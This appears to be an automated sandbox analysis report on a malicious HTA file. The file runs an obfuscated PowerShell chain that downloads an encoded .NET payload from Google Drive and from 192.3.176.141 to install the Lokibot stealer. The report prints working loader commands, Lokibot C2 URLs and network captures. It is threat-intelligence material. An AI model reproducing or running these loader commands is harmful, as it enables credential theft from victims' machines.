Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-10-2024 02:08

General

  • Target

    862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5.hta

  • Size

    204KB

  • MD5

    964a54d784f1cbef1effaa3ab917fcbc

  • SHA1

    6d9d2657d1a8277a3427e0819e8260a2ac341e93

  • SHA256

    862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5

  • SHA512

    c9e0b1cc0597c98f103a84cab21e4fdf4b6d4306db22f3ebd3bccdf08870cf8cb38c7e58047f77f8375059a206294885c4eca91eca8cb14530336620868563cb

  • SSDEEP

    96:Eac75EdYJF9OfdYJh9OC/7oRD1gnQbPy9YhrrudYJOdYJEA9OqdYJG7T:EaA5EmFwfmhwYUZ2mOmEAwqm0T

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
"$imageUrl = 'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.IKLGOL/24/141.671.3.291//:ptth', 'desativado', 'desativado', 'desativado', 'aspnet_regbrowsers', 'desativado', 'desativado','desativado','desativado','desativado','desativado','desativado','1','desativado'));"|invoke-expression
3
4
# powershell snippet 1
5
$imageurl = "https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur "
6
$webclient = new-object system.net.webclient
7
$imagebytes = $webclient.downloaddata("https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur ")
8
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
9
$startflag = "<<BASE64_START>>"
10
$endflag = "<<BASE64_END>>"
11
$startindex = $imagetext.indexof("<<BASE64_START>>")
12
$endindex = $imagetext.indexof("<<BASE64_END>>")
13
$startindex -ge 0 -and $endindex -gt $startindex
14
$startindex = $startflag.length
15
$base64length = $endindex - $startindex
16
$base64command = $imagetext.substring($startindex, $base64length)
17
$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]
18
$commandbytes = [system.convert]::frombase64string($base64reversed)
19
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
20
$vaimethod = ([dnlib.io.home]).getmethod("VAI")
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/logs/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Windows\SysWOW64\winDowspOWErShell\v1.0\PoweRShELl.EXe
      "C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2212
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\baac1aba\baac1aba.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4056
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6CF.tmp" "c:\Users\Admin\AppData\Local\Temp\baac1aba\CSCD7790140F6794CE1AFC858D1741BC4A9.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1256
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4672
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3396
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1312
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              6⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:4732

Network

  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    74.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=07B7CE54DF7368751036DB70DEEC69F4; domain=.bing.com; expires=Thu, 20-Nov-2025 02:08:19 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 077F5FD82A244F5D882E3F1E16706C0A Ref B: LON601060104031 Ref C: 2024-10-26T02:08:19Z
    date: Sat, 26 Oct 2024 02:08:19 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=07B7CE54DF7368751036DB70DEEC69F4
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=pMu2NgIsmEDHAPLRqEh5zQTdmB8-mg_F2mK9lQwsRiM; domain=.bing.com; expires=Thu, 20-Nov-2025 02:08:19 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: D86DD89D643D456583A99850086A19B8 Ref B: LON601060104031 Ref C: 2024-10-26T02:08:19Z
    date: Sat, 26 Oct 2024 02:08:19 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=07B7CE54DF7368751036DB70DEEC69F4; MSPTC=pMu2NgIsmEDHAPLRqEh5zQTdmB8-mg_F2mK9lQwsRiM
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F0110680EA9C49B695157E2530220450 Ref B: LON601060104031 Ref C: 2024-10-26T02:08:19Z
    date: Sat, 26 Oct 2024 02:08:19 GMT
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    10.28.171.150.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.28.171.150.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
    PoweRShELl.EXe
    Remote address:
    192.3.176.141:80
    Request
    GET /42/logisticthingswithgoodthingsgivenbest.tIF HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 192.3.176.141
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 26 Oct 2024 02:08:21 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Fri, 25 Oct 2024 04:05:40 GMT
    ETag: "222be-625453b768b38"
    Accept-Ranges: bytes
    Content-Length: 139966
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: image/tiff
  • flag-us
    DNS
    141.176.3.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    141.176.3.192.in-addr.arpa
    IN PTR
    Response
    141.176.3.192.in-addr.arpa
    IN PTR
    192-3-176-141-host colocrossingcom
  • flag-us
    DNS
    drive.google.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.google.com
    IN A
    Response
    drive.google.com
    IN A
    142.250.179.238
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
    powershell.exe
    Remote address:
    142.250.179.238:443
    Request
    GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
    Host: drive.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 26 Oct 2024 02:08:27 GMT
    Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: script-src 'report-sample' 'nonce-wD8baXeO8aMYOVGT5rf0tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    drive.usercontent.google.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.187.193
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
    powershell.exe
    Remote address:
    142.250.187.193:443
    Request
    GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: image/jpeg
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="new_image-new.jpg"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, 